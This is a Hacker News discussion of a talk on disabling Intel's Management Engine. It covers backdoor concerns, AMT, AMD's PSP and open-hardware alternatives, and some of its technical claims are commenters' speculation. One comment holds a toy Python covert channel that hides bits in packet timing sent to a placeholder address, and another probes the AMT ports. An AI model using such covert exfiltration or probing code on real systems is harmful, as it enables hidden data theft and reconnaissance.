How to become the sole owner of your PC [pdf] (github.com/ptresearch)
254 points by ashitlerferad on May 23, 2016 | 121 comments



30 years ago you could buy an IBM PC/AT and it would come with schematics, detailed programming information, and the complete source code listing for the BIOS[1]. There wasn't really anything "hidden", and you really felt like "the sole owner of your PC". The PC became the dominant platform because of this. Now, because of corporate interests[2][3], much of it is officially under a thick layer of red-tape NDAs, what little else of interest is out there comes mainly from leaks (be thankful for East Asian companies' insecurity...), and there are still plenty of things hidden away. On the other hand, all of this stuff is documented somewhere; whether that documentation will ever see the light of day is the real question (for anyone reading this who does possess such information: please do the right thing ;-) Especially since it's far easier now than before to distribute lots of data, putting the complete ME programming documentation and maybe even the source code online as a download, or supplying it on a disc, would be entirely feasible. But Intel decided against it, which leads me to think they really intended it to be a backdoor-ish sort of thing, and that makes me really sad.

[1] https://archive.org/details/bitsavers_ibmpcat150ferenceMar84...

[2] http://boingboing.net/2012/01/10/lockdown.html

[3] http://boingboing.net/2012/08/23/civilwar.html


> they really intended it to be a backdoor-ish sort of thing

Occam's razor says they really just sell a ton of CPUs to huge datacenters and wanted to solve the problem of having to have some tech go out and physically reset a machine when it misbehaves. If you've ever accidentally powered down a machine that's sitting in some lights-out facility in Northern Alabraska, this kind of technology is a godsend. Now I'm not saying I'd bet my hat that it's 100% secure, or that Intel couldn't be thumb-screwed by the feds to use it as a backdoor in some scenario, but it wasn't built from the ground up to be one.


> If you've ever accidentally powered down a machine that's sitting in some lights-out facility in Northern Alabraska, this kind of technology is a godsend.

I don't get your point. If it's just about OOB management, then there are already plenty of BMC technologies out there (IPMI, ILO, ...). There is no need for AMT/ME here. Or maybe I just misunderstood how this whole thing works.


You can find IPMI on server-grade motherboards everywhere, yes. But what about thousands of laptops and PCs? That's the point of AMT: integrated with an enterprise management system (like Tivoli), you can manage all the things you need on thousands of devices across your company. That's huge.


No, Occam's razor says that if all you want to do is LOM, you put an embedded computer running Linux and ssh, connected only to power and to the console, and nothing else; not a SPARC (?!?) core running proprietary code that does way, way more than just implement support for LOM, and which has access to all memory and CPU state.


That's exactly my thoughts --- the lack of much official information about ME beyond the fact that it exists and can do some stuff is troubling, plus the information gleaned from reverse-engineering it shows a much-obfuscated design. If they had documented it clearly and perhaps even released source for the software, we wouldn't be having this discussion.

http://recon.cx/2014/slides/Recon%202014%20Skochinsky.pdf

SPARC and Java(!) are present in this system. It gives a whole new meaning to the "3 billion devices run Java" advert...


Pretty much. No engineer tasked with implementing a LOM system would decide to port Java to an embedded OS running on a foreign CPU! The requirements are dictated by some other party. We don't know who that other party is, and we don't know what the requirements are. It's entirely normal to be skeptical of all this magic technology.

They even changed the CPU at some point. It used to be ARC, now it's SPARC. The LOM aspect of it didn't change. It worked just fine with ARC before. So why did it change?

There is no technical reason why implementing the LOM function is easier or better with one CPU than with another. In fact, there's no technical reason why implementing anything is easier on one CPU than on some other CPU. The new CPU even seems less power-efficient than the old one. The only reason you'd want a particular CPU architecture is if you want to run some particular code for that particular CPU. And apparently running this secret code is so important that it was worth the huge expense of porting all the other already-existing, already-working firmware they had before.


Completely agree with your sentiment. Just one small nit-pick: Intel doesn't use SPARC, but a much more obscure, less documented, and very proprietary ARC core [1, 2 & 3]. Ostensibly it was chosen due to having some excellent low-power modes.

[1] http://en.wikipedia.org/wiki/ARC_%28processor%29

[2] http://www.eetimes.com/document.asp?doc_id=1248611

[3] http://blog.invisiblethings.org/2015/10/27/x86_harmful.html


They used to use ARC, then they switched to SPARC: https://recon.cx/2014/slides/Recon%202014%20Skochinsky.pdf


"Never attribute to malice that which can equally be explained by stupidity."

Intel is a large company, with lots of engineers, both hardware and software, managers, marketers and project managers. Some really stupid decisions will come out of simple scope creep and someone's pet project suddenly becoming the next product.

Outside of evidence of actual malevolent intention, what you have here is easily a project gone really really weird.


You're describing how most IPMI controllers are implemented. This sounds great and all, until you realize the vendors don't bother to keep things up to date, and run all sorts of extra shit so they have a bigger feature list.


If only IPMI worked this way!

Yes, they use Linux, but, as you say, they run a bunch of other crap that's old and buggy, and the implementation of the protocol itself is not stellar.

How many bugs were found in IPMI implementations vs. ssh over the last 5 years?

We don't need IPMI, we really only need ssh, and a console that allows setting things up (like Open Firmware on RISC machines).

We don't need a new protocol for remotely accessing our machines, when we can remotely export the plain old machine console securely.

Some vendors do work the way I described, at least for their RISC offerings, although, for example, the Oracle ILOM runs some Java web server crap by default. But at least you can turn it off and use pure ssh! No IPMI.
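
To make that concrete, here's a minimal sketch of the "ssh plus serial console" model in Python, assuming a small Linux box wired to the target's console through a pyserial-visible adapter (the device path, baud rate, and the "ssh -t lom-box python3 console_bridge.py" invocation are placeholders, not anything from the thread):

    # console_bridge.py -- toy sketch: bridge this box's stdin/stdout to a serial
    # console so the target can be reached with plain ssh, e.g.
    #   ssh -t lom-box python3 console_bridge.py
    # Assumes pyserial; /dev/ttyUSB0 and 115200 are placeholder values.
    import os, select, sys
    import serial  # pip install pyserial

    port = serial.Serial("/dev/ttyUSB0", 115200, timeout=0)
    stdin_fd = sys.stdin.fileno()

    while True:
        readable, _, _ = select.select([stdin_fd, port.fileno()], [], [])
        if stdin_fd in readable:            # keystrokes typed in the ssh session
            port.write(os.read(stdin_fd, 1024))
        if port.fileno() in readable:       # output from the target's console
            sys.stdout.buffer.write(port.read(4096))
            sys.stdout.buffer.flush()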


It's not a SPARC, it's an ARC. It's a very different processor.


The earlier ME versions used an ARC. The later ones use a SPARC.


Wasn't ARC a simplified SPARC used for teaching CPU architecture? I had to build one in VHDL in my first year.


Well I have no idea how ARC came into existence, but looking at the ISA, it has nothing in common with SPARC (I write SPARC compilers for a living, so I know the ISA pretty well).


I don't know the full story, but it was a spin-off of the work that Argonaut did for the SuperFX chip in Star Fox on the SNES -> https://en.wikipedia.org/wiki/ARC_%28processor%29


> If you've ever accidentally powered down a machine, ... this kind of technology is a godsend.

How do I use this technology to, say, boot my turned off but plugged in and network-connected laptop?

I mean in a legitimate way. I'd really love to see how this works (and then be horrified).


Search Google for AMT tools and you will find what you are looking for. AMT will need to be turned on in the BIOS, though.
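
As a rough first check, you can see whether a box is even answering on the well-known AMT ports; a minimal Python sketch (the target address is a placeholder, and this is only a reachability check -- actual power control goes through AMT's web/WS-Management interface, which the real AMT tools speak):

    # amt_probe.py -- check whether a machine responds on the well-known Intel AMT
    # ports (16992 HTTP, 16993 HTTPS, 16994/16995 redirection). Reachability only;
    # the default target address below is a made-up example.
    import socket, sys

    host = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.50"
    for port in (16992, 16993, 16994, 16995):
        try:
            with socket.create_connection((host, port), timeout=2):
                print(f"{host}:{port} open -- AMT appears to be provisioned and listening")
        except OSError:
            print(f"{host}:{port} closed or filtered")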


I agree with you on this one. I just see it as in-band lights-out management.


Relevant, related talk from 32C3 by Joanna Rutkowska

https://media.ccc.de/v/32c3-7352-towards_reasonably_trustwor...


I've never heard of this before. This feels like science fiction. You'd think this would have blown up all over the internet 50 times over? What can 'they' do with this?


It is like cell phone radios with DMA access. Anything they want, in practice. If you are buying any computer commercially it always has backdoored hardware with a wholly proprietary coprocessor with networking and memory access.


I used to write software for the cellular radio baseband. I certainly didn't put any backdoors in, but of course it would be possible. I don't think there is any conspiracy though, shared memory is just efficient and convenient for shuffling lots of data. Phone designers are not really trying to have security barriers between hardware components, and on many phones the baseband is inside the same chip as the main processor.


Can you please share links of evidence of this? Thank you


See http://www.osnews.com/story/27416/The_second_operating_syste...

Every brand of smartphone has this secondary firmware, entirely separate from the primary OS. Without it, you can't connect to the cellular network.



> has backdoored hardware with a wholly proprietary coprocessor with networking and memory access.

Well, they don't even need a separate coprocessor. They could just swap out the registers of the main CPU, and use the full power of that CPU. Basically, it would work like context-switching works in a multithreading environment.


Really??


Yeah, really. It's relatively well known among free software enthusiasts. The trouble is, what do you do about it?


Buy a Libreboot T400? It comes without Intel ME and is FSF-certified: https://minifree.org/product/libreboot-t400/

It is pretty expensive for the amount of performance you get, but you are getting a fully documented, auditable and free product. It comes with instructions on how to update/build/flash/modify your firmware. You're also supporting the Libreboot project.


Wow, thanks for introducing me to this. Been wanting a new laptop for coding and writing and I would be 100% behind something of that nature.

Have you had the chance to use it?


I haven't yet, but mine is underway.

The model I got has 8GB RAM, a 240GB SSD, a 1TB HDD, and a Core 2 Duo processor, and is upgradeable to a Core 2 Quad.

However, I'm strongly considering just keeping it as a backup. To me it represents the best possible backup computer, durable and auditable.

It's backup for when my current computer breaks down, but also for when new sinister surveillance and encryption laws are passed. Or for when the web turns into even more of a wild-west with hackers and nation-states doing whatever they feel like.

I kinda feel like it was a bad idea to even discuss my ordering of this on a non-throwaway, from an IP vaguely linked to me.

.

That went kinda dark. Guess I haven't been taking enough Soma.


I have never used the T400, but I am writing this comment on the similar X200 with Libreboot. It's a great little machine for basic tasks like coding and writing.


I have a Libreboot-ed X200 and it's pretty great. Haven't tried watching videos on it, but it does web-browsing and coding just fine.


This project needs more publicity.


On the phone side you would have to use Replicant, which sandboxes the modem.

http://www.replicant.us/

Problem is, the project is mostly dead. Nothing from the last four years is supported, and it's stuck on Android 4.2.


You donate to or buy from https://neo900.org.


You stop using phones.


Yeah same with those, I'm quite aware, but I do enjoy the benefits of having wireless internet during the 1.5h commute by public transport every day.


Just more evidence that modern CPU designs need to die, and that a libre alternative is required.


I mean, they don't need to die, but it would be nice if we had a Steve Wozniak archetype instead of a Steve Jobs running things like this.


My vote goes to Richard Stallman.


The problem to be solved here is not just software. How do you beat the economies of scale that standard designs have achieved?

For most applications, the end user gets vastly more computing power per dollar spent when they buy an off the shelf design that's in large scale mass production.

You could port BSD or Linux to your new architecture for a reasonable amount of money (though that's already an uphill battle selling that to a consumer). How are you going to even come close to the unit economies of scale that Intel and other large established players enjoy?


The advantage Intel has built up is a tenuous one. They've had a lead in building up fabrication facilities for each new node. When we reach the final node - 5nm? whatever it is - the economies of scale will shift towards generic fabs. This will open the door to open designs such as RISC-V [0]. The future is looking bright for those who love freedom!

[0] http://spectrum.ieee.org/semiconductors/design/the-death-of-...


Intel has a massive R&D budget. They'll probably be the first to achieve post-silicon tech if nothing dramatic happens. So the question is whether they'll be quick enough to innovate before generic chips eat their lunch.


I don't doubt that they are a front-runner for post-silicon tech. The question is whether they'll be able to sustain exponential growth in performance. I have my doubts. Radical new technologies are far less predictable than iterative ones.


do you need 40GHz with 32 cores, or 2 cores at 1.5GHz and the guarantee of full control?

for personal computing, I'd take the latter


By far the latter. My computation needs have been satisfied for years now; paternalistic, insecure platform lock-in crap irritates me far more than access to cutting-edge technology would benefit me.


For my actual day to day work? The latter, by far. I can get nearly all of my computing done comfortably on a raspberry pi. Most of what I need to do involves remote terminals via SSH, which I can run on any toaster.

I do own a desktop gaming PC though. It's running Windows 10 on a respectable Intel CPU with a highish end nVidia graphics card. On it are my games. On it are only my games. If I need to do any development work, I boot that machine into Arch Linux. That's partly because I don't trust Windows, but it's mostly because the development environment is better on a Linux system anyway, for what I do regularly.


I use an old Core 2 laptop daily. It peaks at 2.4GHz, but I run it at 800MHz-1.2GHz when on battery. At 1.2GHz I can browse the web just fine with JS disabled, but when I need to enable JS it starts to suffer. I can do light coding in emacs, but I wouldn't want to compile large codebases on it.

So, yes, it would work fine depending on your needs, but be aware that a Core 2 is not exactly a bad CPU. It is a 4-wide, aggressively out-of-order machine with a pretty good memory subsystem. Are any of the open CPU replacements as good?


The vast majority of users are comfortable with the status quo. Therefore anyone who implemented and sold their own modern CPU without 'features' like the ME would have to sell it at a premium price, if only because of the much smaller target audience, and that would shrink the audience even further.


That's exactly what happened almost every time. Another commenter posted a link to OSS CPUs. Two of them, LEON3 and SPARC T1/T2, are great CPUs released under the GPL. Gaisler had a lot of other I.P. to go with LEON3. Now, tell me what FOSS-loving companies brought those to market or have a board to sell me? Anyone? Bueller?



Where can I get the full source of POWER8 under GPL or another free license? I thought they were licensing it for money. I'm not sure if it's behavioral or RTL either that they provide. I know very little of it whereas I can download Leon or OpenSPARC of their web sites. I'd go with a version of Leon given Oracle is so sue happy.


There are a few groups out there but nothing I would say is commercially viable.

https://en.wikipedia.org/wiki/Open-source_computing_hardware...


I'm still waiting for that semiconductor technology to become available to the DIY community.


While I wait patiently for more open hardware designs to become more popular / actually used (Be it SPARC, RISC-V or something else), I wonder what AMD's equivalent functionality is like in comparison to this - I strongly doubt that no equivalent exists for AMD CPUs.


From https://libreboot.org/faq/#amd

# Why is the latest AMD hardware unsupported in libreboot?

It is extremely unlikely that any post-2013 AMD hardware will ever be supported in libreboot, due to severe security and freedom issues; so severe, that the libreboot project recommends avoiding all modern AMD hardware. If you have an AMD based system affected by the problems described below, then you should get rid of it as soon as possible. The main issues are as follows:

# AMD Platform Security Processor (PSP)

This is basically AMD's own version of the Intel Management Engine. It has all of the same basic security and freedom issues, although the implementation is wildly different.


The PSP is an ARM core with TrustZone technology, built onto the main CPU die.

That sounds even worse than ME:

Intel Management Engine (ME) is a separate computing environment physically located in the (G)MCH chip.

Theoretically, if a third-party can figure out how to make a compatible MCH they can use Intel CPUs without ME, but that is impossible with AMD's design.

Then again, developing a compatible MCH would be nontrivial too --- the last truly "open" x86 bus interface was probably Socket 370 (still in use by VIA and others), and the later bus interfaces are such high speed that they require some very expensive signal analysers to even see the communications properly.


There's always the non x86 path.

I have recently purchased a pi-top, which is basically a 3D-printed laptop case + laptop battery + keyboard + display + Raspberry Pi 3. The keyboard could be better and I'll swap out the Pi for a BeagleBone Black (the Pi comes with a binary blob), but it's a surprisingly useful package. I only bought it to experiment a bit with ARM assembly on the go, but it's actually powerful enough for a lot of day-to-day stuff (mail, surfing, LibreOffice, programming). Not great, but good enough.

Of course you have to be willing to trade speed and the availability of some programs for that control, but in theory a BeagleBone + input and output devices makes a nice little open machine for a lot of day-to-day stuff.


ARM isn't a lot better. It helps that the (relatively simple) boards have the schematics available, but most platforms require binary blobs and there are few of them that don't have a bunch of useful information tucked away behind a gazillion NDAs.

The various warts in the implementation (e.g. no BIOS, so there's quite some effort going just into making something boot on a new ARM board) and the non-standard, or just closed source-dependent, augmentations that are required in order to make an ARM CPU do anything breathtaking (PowerVR and Mali, TI's EVEs) also mean that, at least if you're using Linux, you're often living outside the mainline kernel. I have very few kind words to say about some of the code that I've seen in manufacturers' kernel trees, especially on let's-pump-two-more-cores-before-next-years-mobile-world-so-that-we-can-play-a-demo-that-looks-exactly-like-last-year-except-salespeople-are-gasping-for-some-reason, the ancient Indian name by which ARM is also known in some places. I would rather not have useful/important data reside on devices which run that stuff.


I have admittedly not investigated it very deeply, but the BeagleBone Black seems good enough, with compromises. AFAIK it will boot without a blob but contains one for the GPU (PowerVR). The device will run non-OpenGL stuff fine, and I believe there is some progress on reverse-engineering an open driver. OpenBSD has an armv7 (am335x) port, which is my baseline indicator that it's at least somewhat usable without any blobs.

I'll yield to more informed people, but finding a reasonably useful and completely open machine (I guess I can live without HDL for everything, but it would be nice) has been a quest I go on every now and then. ARM seems to be the best (and most affordable) bet. I'll gladly take other suggestions, as the whole ARM licensing model doesn't really sit well with me.


I go on that quest every once in a while, too, but without too much luck.

I haven't run OpenBSD on the BeagleBone Black, but I imagine it has no graphical output of any kind. I see the X packages, but the only on-board devices listed as supported are:

    BeagleBone, BeagleBone Black
    Supported on-board devices:
      standard serial port (com)
      watchdog controller (omdog)
      ethernet controller (cpsw)
      GPIO controller (omgpio)
so it boots but it seems a little unlikely that you can do much post-1980s work on it.

I run into various ARM platforms at $work. The platform, as a whole, is probably a step backwards from e.g. PowerPC; it's very relevant today because its power consumption is very hard to beat, and between mobile phones, tablets, IoT and in-car infotainment, this is an important topic. But unless you need something that's super low power, the only thing ARM CPUs have to show for themselves is that they aren't x86. This is more than made up for by the headaches involved into getting stuff that runs on a company's Cortex A7 to run on another company's Cortex A7.

This isn't to say that it's a bad thing. Pre-64-bit ARMs were designed (with the exception of some really old stuff in the 80s) as a platform for appliances, not for computers. They're excellent for designing phones and tablets and smart TVs and whatnot. It's trying to bolt a general-purpose environment on top of them that gives people headaches.


The display controller on ARM SoCs is typically separate from the Mali or PowerVR GPU and is often documented. If there are multiple ARM cores on the SoC then the display may still feel fast enough for basic stuff even though the CPU is doing all the work. Another factor is that some modern GPUs are 3D only, the graphics stack gets a lot more complicated if it has to translate 2D requests from an application into OpenGL calls to the GPU.

NetBSD has a framebuffer driver for TI OMAP CPUs so it could be possible to port it to OpenBSD.


Ah -- yes, on many (most?) devices, you can get framebuffer output without the GPU. I just don't know if OpenBSD has that.


Has anyone found a remote attack via the Management Engine yet? It's basically a backdoor; there must be some way to make it do things.


Yes. Wiki: https://en.wikipedia.org/wiki/Intel_Active_Management_Techno...

> A Ring -3 rootkit was demonstrated by Invisible Things Lab for the Q35 chipset; it does not work for the later Q45 chipset as Intel implemented additional protections.[39] The exploit worked by remapping the normally protected memory region (top 16 MB of RAM) reserved for the ME. The ME rootkit could be installed regardless of whether the AMT is present or enabled on the system, as the chipset always contains the ARC ME coprocessor. (The "-3" designation was chosen because the ME coprocessor works even when the system is in the S3 state, thus it was considered a layer below the System Management Mode rootkits.[32]) For the vulnerable Q35 chipset, a keystroke logger ME-based rootkit was demonstrated by Patrick Stewin.[40][41]


Though not a simple remote attack in that sense, AMT has been used by rootkits before:

https://en.wikipedia.org/wiki/Intel_Active_Management_Techno...

A nice overview of what AMT and ME is capable of (and has been for the past decade) can be found in libreboot FAQ:

https://libreboot.org/faq/#intel


perhaps everyone who finds something disappears? </sarcasm>

seriously, AMT is the stuff of nightmares. runs even when the machine is powered off.


AMT is the reason I mock anyone here who calls concerns about backdoors in Intel's RNGs ridiculous. The whole CPU is backdoored, with a backdoor that can run even when it's off. Including probably the RNG, given that debug wires are probably connected to it. Let's not worry about one feature when we have a subversion this big.

Biggest irony: they advertise it as a feature for IT management. ;)


My team spent a bunch of time looking at AMT as a management tool -- it adds lots of complexity and accomplishes almost nothing that cannot be done easier a half dozen other ways. The only functionality we saw any real use for was an always on VPN and remote wake up where networks block WoL.

The other thing that's even stranger is Absolute Software, a little company nobody has ever heard of who somehow got every OEM to bundle their code in system BIOS for theft recovery since the 90s.


re Absolute

It seriously reads like a botnet description. I'd have believed them if they said "From the innovators behind Storm comes new endpoint protection..."

https://www.absolute.com/en/about/persistence


It is pretty disturbing. We were lobbied pretty heavily to evaluate it and did some field tests as a result.

You can do some wacky shit with it. There is one mode where you can configure it to delete certain directories or files to screw around with a thief. That can be tweaked to delete files that the system needs. Those modes are persistent, and even after reformatting or replacing the boot media, the agent will reinstall and retrieve its policy file.

If you use it with Intel AMT, it can also brick the device permanently. (http://www.intel.com/content/dam/doc/product-brief/mobile-co...)

Everyone who tested the product had two questions: "Who is buying this?" and "How do I get this dormant code off my devices?"

Laptops aren't cheap, but they aren't expensive enough as an asset to care that much about recovery. And there are arguably better ways to safeguard data assets.


Glad to see my laptop vendor is not on their list


I'd argue that a factory-backdoored RNG would be infinitely more dangerous. An AMT exploit wouldn't be passive, and it wouldn't weaken every crypto operation preceding the time of the attack. Between the two, which do you think an entity with a massive surveillance network, and a history of intentionally weakening security infrastructure, would prefer?


An AMT exploit, having internal access to the CPU, could weaken an RNG plus anything else you can think of. Passive attacks are definitely possible with a backdoor: it just makes a component, hardware or software, do something upon certain trigger conditions, and otherwise stays silent. An example from the high-assurance field:

https://calhoun.nps.edu/bitstream/handle/10945/6073/02Mar_An...


I think woodman's argument is that AMT is an active service, so you should see network traffic to the management engine and such, and firewalls/airgaps/SPI should detect and prevent tampering. I think that is a naive view of AMT; it seems far more capable, and network management is just one avenue (and it's been proven difficult to implement comprehensively anyway).


> ...so firewalls/airgaps/SPI should detect and prevent tampering. I think that is a naive view of AMT...

Nope, I'm talking about scale. You'd need to signal (paint with radar, send a packet, dip the power in morse code, put the magic cookie in the root DNS server response, whatever) every target at least once prior to exploitation. But yes, stealth would certainly be a concern that would reduce the value of AMT relative to a factory backdoored RNG.


Ahh. I think the hardware parts of my write-up on smartphone risks will help here:

https://news.ycombinator.com/item?id=10906999

Basically, modern SoCs are mixed-signal systems that have digital, analog, and often RF capabilities. I've imagined, with limited HW knowledge, quite a few attacks on digital subsystems using analog or RF components. HW gurus I know encounter sneaky stuff like that in 3rd-party I.P. regularly and have to mitigate it. Most people have no clue it exists. They're mitigating at the networking channel, which is a mere abstraction over more complex stuff going on in the chip and at the interface point. You could even embed a radio in the sucker that turned on when it detected a certain signal in a packet header that NIDS certainly wasn't analyzing.

Note that the NSA TAO catalog includes active attacks with radars that rely on physical materials in counterfeit parts, and SoCs with embedded radios hidden in USB connectors. Quite a few attacks at the SoC level that software people will never see coming.


I'm not saying that AMT is no big deal, I'm saying that an intentionally weakened RNG is pretty much the worst thing ever. All crypto prior to targeting would be vulnerable: tor, bitcoin, pgp - for every machine leaving the factory with an Intel chip hosting badRNG v0.89 (depending on OS utilization).


I'm looking forward to this being complete: https://www.olimex.com/Products/DIY%20Laptop/

Any ideas what a Chinese ARM chip might have for backdoors?


Anything.


So ... is my macbook or Dell server pre-pwned by Intel and re-pwned by the Chinese? What, exactly, am I supposed to be afraid of here?


Well, as per the coreboot docs [1], the panic level is only 9000+...

[1] https://www.coreboot.org/Binary_situation#Intel


Nothing, as long as you have nothing to hide. :-)


So if you have business secrets, you will have worries... :-)



Does anyone know of a tool or even sequence of actual commands to disable the Intel ME AMT functionality?

Did I miss it in the slides?

I see explanations and low-level temporary/soft-disablement references, but nothing immediately actionable.


There is no prescribed way to disable it, and it looks like the slides only provide a glimpse of the workarounds/hacks needed to do so. I imagine there's a lot we're missing from this presentation, though, because it looks like there was a demo.


The demo is also available in the repository. https://github.com/ptresearch/me-disablement/blob/master/Int...


Only for relatively old models, see https://libreboot.org/faq/#intelme.



So, forgive me for this probably being an oversimplification, but is this the same sort of thing as the old Clipper Chips?

https://en.wikipedia.org/wiki/Clipper_chip


As I understand it, the Clipper chip was a combined encryption accelerator and key escrow device, with the escrow basically working as a government backdoor.

The Intel Management Engine is another computer in your computer, running its own OS, and able to see everything your computer is doing, and modify it, including things like network transfers.


How about firewalling whatever ports the Intel code may use? If it can't communicate with the Internet, presumably it's not likely to do any harm.


That only works for very simple surveillance. It has complete control over your hardware, and it can encode information that it wants to get off of the system in a variety of different ways.

If you want to firewall ports or IP addresses on the machine itself, obviously that doesn't do anything, so you'd need to do it on your router (which you hope doesn't have a similar backdoor that cooperates with the ME). First you'd need to know what to block, which is difficult enough, and then you'd have to trust that that information doesn't change.

But even then, all it takes is for AWS or CloudFlare or $Foo to collude with Intel to get at your juicy data again, so you really would need to work on a blocked-by-default basis, which is possible, but not really practical, depending on what you're doing.

It really depends on what your threat model is. If you're a high-value target to someone with a lot of resources, you're essentially screwed.

It can broadcast information via your speakers, and maybe even your microphone. It can encode data in the timing of your packets as they leave your system. It can encode data in its power consumption, it can encode data in what it sends to the screen, it can send data out via bluetooth or wifi. There are probably more ways that I didn't think of off the top of my head.
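
To illustrate how low-tech the packet-timing channel can be, a toy Python sketch (the destination address, port, and delay values are all invented for the example) that leaks one bit per datagram in the gaps between sends:

    # timing_channel.py -- toy illustration of encoding bits in inter-packet
    # delays: long gap = 1, short gap = 0. The destination (a TEST-NET address,
    # discard port) and the delays are made up for the example.
    import socket, time

    def send_bits(bits, host="192.0.2.1", port=9, short=0.1, long=0.4):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        for bit in bits:
            sock.sendto(b"ping", (host, port))   # looks like boring traffic
            time.sleep(long if bit else short)   # the gap carries the bit
        sock.close()

    send_bits([0, 1, 0, 0, 1, 0, 0, 0])  # a hidden byte riding on "normal" packets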

We have Free Software all the way down to the firmware level. Not widely available, but the potential is there. That is good.

But for computers that we can really trust, we need to go deeper.

*looks up Czochralski process*


And it cooperates with Intel NICs - and when the ME is half-disabled, the NIC starts showing erratic behaviour.

I’m back to using a realtek NIC from 2006 now.


Note that the firewall would need to exist outside the suspect system. And make sure your firewall device is not itself affected by this.


Firewalling ports for incoming connections and IP addresses for outgoing, I should say.


Just be mindful of the fact that you've only increased the difficulty of an attack; the vulnerability still exists. I've got a Lenovo that regularly sends out dhcp broadcasts, despite no dhcp code being on disk, and it could just as easily call home with dns (sending recursive requests to the same IP as the last successful user-initiated query). The only way to fix a ring -N rootkit is to remove ring -N.


> sends out dhcp broadcasts, despite no dhcp code being on disk

Woah, that's not just sitting there but actually actively doing stuff while bypassing your kernel. This sounds a lot more scary even though I know nothing about this Lenovo dhcp thing, observing it just makes it a lot more real to me.

Do you have any more information on this?


It has been several years since I dug into it, so I can really only offer keywords: AMT[0], which is a component within ME[1].

Also see https://media.ccc.de/v/30C3_-_5380_-_en_-_saal_2_-_201312291...

EDIT: I forgot to mention Computrace, the BIOS anti-theft service. IIRC that interacts with ME.

[0] https://en.wikipedia.org/wiki/Intel_Active_Management_Techno...

[1] https://www.kernel.org/doc/Documentation/misc-devices/mei/me...


It would be useful to boot the machine with FreeDOS (which has no networking code) and see what, if anything, comes out the Ethernet port.


No need, everything is compiled from source, no dhcp to be found, and the kernel's network stack shows no traffic - but the switch does. It is no secret that Intel ME does whatever it wants with the ethernet port.
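
If you want to reproduce that kind of observation, a sketch of the external-observer setup: mirror the suspect machine's switch port to a second box and log every frame sourced from its MAC. This is a scapy-based sketch assuming a SPAN/mirror port and root privileges; the MAC address is a placeholder.

    # watch_nic.py -- run on a separate machine attached to a switch mirror/SPAN
    # port; logs any frame whose source MAC is the suspect NIC, regardless of
    # what the suspect host's own kernel claims to be sending.
    from scapy.all import sniff  # pip install scapy

    SUSPECT_MAC = "00:11:22:33:44:55"  # placeholder: MAC of the machine under test

    def log_frame(pkt):
        print(pkt.time, pkt.summary())

    sniff(filter=f"ether src {SUSPECT_MAC}", prn=log_frame, store=False)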


The PDF won't open for me on a Nexus 5, and it doesn't show through GitHub's mobile site either.

Edit: It worked when I requested the desktop version of github though.



It crashes chrome on my iPad consistently. But then so does a page of animated gifs.


Sigh... crashes on Chromium on Linux as well.

<tinfoil_hat>maybe ME is detecting it and wants to prevent us from knowing about it?!?</tinfoil_hat>


Thrashes a bit in Chrome on Windows for me.


Looking at that GitHub page brought my workstation to its knees also... It's not a weak machine either (desktop i5 with 16GB RAM).


The best way to disable the Intel ME is to reflash your system with the ME firmware in Manufacturing mode (if your system isn't already in that mode) and then use the ME runtime-disable command (which can be sent with me-tools: https://github.com/skochinsky/me-tools) at each boot.


Seems like if I really want to know what's going on at that level, I should really use something simpler, like a Raspberry Pi...


Why would you switch to a system that relies on NDA-protected chips when there are free ones available like the BeagleBone?


Is a BeagleBone like a raspberry pi? :)


It's only a matter of time. Once computer technology stabilizes, it will become a commodity, well documented, etc. You can already make completely open breadboard computers that are more powerful than 50-year-old machines. It might be several decades, though.


Maybe we should all flash our Intel CPUs, claim warranty, and keep the next CPU. Initial support will have to RMA it under "The computer is broken, it shuts down after 40 secs!".


How would that solve anything? (Not that you could claim warranty anyway.)


Link to the talk?


http://www.phdays.com/broadcast/ > Scroll to bottom > Third from last > How to Become the Sole Owner of Your PC

The talk is ~3.5 minutes, transcribed live to English. Sadly you're not missing much by just looking at the PDF.




